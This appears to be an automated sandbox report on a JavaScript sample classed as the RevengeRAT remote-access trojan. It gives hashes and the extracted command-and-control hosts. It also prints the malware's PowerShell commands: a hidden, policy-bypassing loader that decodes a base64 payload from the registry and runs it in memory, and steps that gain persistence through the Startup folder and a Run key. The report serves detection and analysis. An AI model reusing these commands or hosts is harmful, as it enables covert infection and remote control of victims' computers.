Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
19-03-2024 23:15
Static task
static1
Behavioral task
behavioral1
Sample
d7520f1f5438e4e82c1234fbcb10c6dc.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
d7520f1f5438e4e82c1234fbcb10c6dc.js
Resource
win10v2004-20231215-en
General
-
Target
d7520f1f5438e4e82c1234fbcb10c6dc.js
-
Size
32KB
-
MD5
d7520f1f5438e4e82c1234fbcb10c6dc
-
SHA1
3519cb4f9c82611a9a40e3d15b3fb5432bad023e
-
SHA256
1572fa79a4de01323cc1f469d514d9711b3f88f47eedf6af7041f595d23f0c6a
-
SHA512
2f7069d30f6d6e078510f7052370eeb0b13a13bc46c1482a213dcb224d1996ea2243b8a52962b4d1617f7359ebfd9e832d33762f61cfab92476ea82120bacfa3
-
SSDEEP
768:PhbHMfBd7PENmw5hWh70OyDbod+wvlJKAiv6AGi0/ZWThQ:5HMfzemquy3od+wvlJKAi9Gi0B2Q
Malware Config
Extracted
revengerat
Office
workwinrarhost.ddns.com.br:333
office.minhaempresa.tv:333
RV_MUTEX-ViGGjjtnxDpnFw
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
RevengeRat Executable 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2828-12-0x0000000002830000-0x000000000283A000-memory.dmp revengerat -
Blocklisted process makes network request 20 IoCs
Processes:
powershell.exeflow pid process 3 2828 powershell.exe 4 2828 powershell.exe 6 2828 powershell.exe 7 2828 powershell.exe 8 2828 powershell.exe 9 2828 powershell.exe 10 2828 powershell.exe 11 2828 powershell.exe 12 2828 powershell.exe 14 2828 powershell.exe 15 2828 powershell.exe 17 2828 powershell.exe 18 2828 powershell.exe 19 2828 powershell.exe 20 2828 powershell.exe 21 2828 powershell.exe 22 2828 powershell.exe 23 2828 powershell.exe 25 2828 powershell.exe 26 2828 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Office.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7520f1f5438e4e82c1234fbcb10c6dc.js powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Office = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2828 powershell.exe 2832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 2832 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
wscript.exedescription pid process target process PID 272 wrote to memory of 2832 272 wscript.exe powershell.exe PID 272 wrote to memory of 2832 272 wscript.exe powershell.exe PID 272 wrote to memory of 2832 272 wscript.exe powershell.exe PID 272 wrote to memory of 2828 272 wscript.exe powershell.exe PID 272 wrote to memory of 2828 272 wscript.exe powershell.exe PID 272 wrote to memory of 2828 272 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\d7520f1f5438e4e82c1234fbcb10c6dc.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js'))"2⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"2⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5f19d9ea6a6a0d49bf8b37f9575e94712
SHA1789cd1284971429d4677f3694508c619703899ce
SHA256a4bc1eb07371da6a6a59fbc8cfa947003825544823fd81baa17a7a288158083d
SHA512592665aa84aecb432a1c8c4ebae6a25bdab0875cee1376e7485757477c2cf7e9ff5d6e52a4dcc3414cce62fd3ae30a764ffff93c55023ffc1a275f3b6aae186d
-
memory/2828-19-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/2828-10-0x00000000024F0000-0x00000000024F8000-memory.dmpFilesize
32KB
-
memory/2828-29-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/2828-12-0x0000000002830000-0x000000000283A000-memory.dmpFilesize
40KB
-
memory/2828-27-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/2828-28-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/2828-26-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmpFilesize
9.6MB
-
memory/2828-16-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmpFilesize
9.6MB
-
memory/2828-17-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/2828-18-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmpFilesize
9.6MB
-
memory/2828-21-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/2832-20-0x00000000025A0000-0x0000000002620000-memory.dmpFilesize
512KB
-
memory/2832-22-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmpFilesize
9.6MB
-
memory/2832-23-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmpFilesize
9.6MB
-
memory/2832-25-0x00000000025A0000-0x0000000002620000-memory.dmpFilesize
512KB
-
memory/2832-24-0x00000000025A0000-0x0000000002620000-memory.dmpFilesize
512KB
-
memory/2832-14-0x00000000025A0000-0x0000000002620000-memory.dmpFilesize
512KB
-
memory/2832-15-0x00000000025A0000-0x0000000002620000-memory.dmpFilesize
512KB
-
memory/2832-13-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmpFilesize
9.6MB
-
memory/2832-9-0x000000001B190000-0x000000001B472000-memory.dmpFilesize
2.9MB